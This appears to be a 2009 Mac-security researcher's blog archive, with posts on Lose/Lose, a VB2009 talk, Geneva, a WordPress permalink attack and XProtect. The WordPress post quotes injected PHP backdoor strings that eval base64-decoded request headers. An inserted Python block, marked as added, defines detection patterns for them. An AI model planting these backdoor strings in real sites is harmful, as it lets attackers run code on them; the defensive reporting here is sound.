
Archive for the ‘Daily Thoughts’ Category

Have you played Lose/Lose?


As the author describes it, “Lose/Lose is a video-game with real life consequences.”

This game runs only on the Mac and, as its warning explains, it deletes files whenever the player kills the aliens. Yes, it is interesting, but unfortunately it poses a serious threat to users.

So, if you happen to see this screen, I advise you to quit the application immediately (Command + Q) before it’s too late!

VB2009

September 25, 2009

I should have posted this content here as well.

So, the presentation took a different twist from what I wrote in the whitepaper. In my introduction I built up an understanding of Mac security, leading the context into an analysis of the specific threat families. I then took a macro view, broadening the perspective to the attackers’ underlying business models and the competitive advantages they bring, and laying out the means, the motive and how these aspects created the opportunity that enables these organized groups to deploy threats and attacks against Mac users.

While the momentum of interest and excitement was building, my presentation suddenly froze and a crash report popped up. Indeed, an ice breaker as I continued to deliver the remaining slides.

At the end, the presentation shared some actual infection reports and showed data on how successful these threats have been at penetrating this platform.

It was a great experience, and at the same time a chance to meet fellow researchers at this conference!

Greetings from Geneva!

Jet d'eau

Jet d’eau (Water Fountain), as taken this morning. It was hot and sunny here in Geneva, so it’s the best time to walk around, take some pictures and chill out after taking a good rest and recovering from the long trip from Melbourne.

St. Pierre Cathedral

St. Pierre Cathedral is a cathedral in Geneva, Switzerland, belonging to the Swiss Reformed Church.

Wor{d|m}press

It’s a really tedious job to update and, perhaps, patch from time to time. I should say, security comes with great responsibility, just like parking your car in the right place or locking your valuable computer when leaving.

Last week, users running older versions of WordPress noticed unusual strings added to their blogs’ permalinks, which break the links to blog posts.

journeyetc.com responded and described the attack:

“If you use wordpress, you should check ASAP your blog’s permalinks/rss feed.
If they are broken and look like this
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
or
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
or
‘error on line 22 at column 71: xmlParseEntityRef: no name wordpress’ for your feed
then you are the victim of the new hack attempt targeting our blogs.”

Affected users now face the dilemma of upgrading and cleaning up. The SQL injection attack leaves a backdoor which, even after upgrading, may allow a remote attacker to get in. For further reading, I recommend the post “Old WordPress versions under attack” by Lorelle.
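A defensive check for the two permalink strings quoted above, as an added example that is not part of the original post or of WordPress: it percent-decodes a permalink value and looks for the `eval(base64_decode($_SERVER[...]))` marker both strings share. The function names, the clean permalink and the double-encoded variant are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Marker common to both injected strings: ${eval(base64_decode($_SERVER[KEY]))}
INJECTED = re.compile(
    r"\$\{\s*eval\s*\(\s*base64_decode\s*\(\s*\$_SERVER\s*\[\s*['\"]?(\w+)['\"]?\s*\]",
    re.IGNORECASE,
)
# Feed parser error quoted in the post as a third symptom.
FEED_ERROR = "xmlParseEntityRef: no name"

def fully_unquote(value, max_rounds=5):
    """Percent-decode repeatedly so %7B and %257B forms compare equal."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def check_permalink(value):
    """Return the $_SERVER key the injected code reads, or None if clean."""
    match = INJECTED.search(fully_unquote(value))
    return match.group(1) if match else None

def check_site(permalinks, feed_text=""):
    """Collect findings across permalink values and the rendered feed."""
    findings = [("permalink", p, check_permalink(p))
                for p in permalinks if check_permalink(p)]
    if FEED_ERROR in feed_text:
        findings.append(("feed", FEED_ERROR, None))
    return findings

# First two strings are the ones quoted in the post; the rest are constructed.
SAMPLES = [
    "%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/",
    "/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%",
    "/%&(%257B$%257Beval(base64_decode($_SERVER%255BHTTP_REFERER%255D))",
    "/%year%/%monthnum%/%postname%/",
]

if __name__ == "__main__":
    feed = "error on line 22 at column 71: xmlParseEntityRef: no name"
    for kind, value, key in check_site(SAMPLES, feed):
        print(kind, key, value)
```

Run it over the permalink structure stored in the blog's options and the permalinks as they appear in generated pages; a hit means the blog needs the clean-up described in the post, not only an upgrade.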

About XProtect

Very good information about Snow Leopard malware protection, its capabilities and limitations:

Snow Leopard malware protection system: What does XProtect do?


Snow Leopard includes malware protection

Interesting news (it’s now all over the net) – Snow Leopard includes malware protection that detects two known threats, RSPlug and iServices. (Intego first spotted this anti-malware feature.)

Now curious thoughts are buzzing around: many suspect that Apple is using ClamAV, although Ryan Naraine at the ZDNet blog has confirmed that Apple is not using it. Others suggest that it might be using Symantec’s engine, because of the naming convention used: “OSX.RSPlug.A, OSX.iService.A”.

Anyway, in perspective, it seems Apple is taking no chances with emerging and prevalent threats on the Mac (as noted in recent changes). It is taking steps forward to deliver protection and exercise due care – which is good.

“Due care is care that a reasonable man would exercise under the circumstances”

At the end of the day, security is a process, which lives and deals with reality – our day to day computing activities.

Security research, findings and awareness provide an avenue for a better understanding of these (impending) attacks or threats.

Am I infected?

I love reading emails, especially ones with a background =)

userreport

If you just double-click it, then you are not infected. However, if you follow through and successfully finish the installation process, then you are definitely infected!